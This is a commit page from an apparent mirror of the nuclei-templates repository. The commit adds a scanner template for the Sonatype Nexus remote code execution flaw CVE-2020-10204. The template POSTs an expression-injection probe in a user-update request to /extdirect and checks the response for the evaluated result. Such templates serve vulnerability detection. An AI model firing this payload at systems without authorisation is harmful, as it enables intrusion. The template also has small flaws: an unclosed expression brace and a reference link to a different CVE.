daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2020-10204.yaml

patch-1
Aditya Soni 2020-07-07 01:54:18 +05:30 committed by GitHub
parent 2499aaa0a6
commit 9c8104f937
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
cves/CVE-2020-10204.yaml Normal file
View File

@ -0,0 +1,22 @@
id: cve-2020-10204
info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
#reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200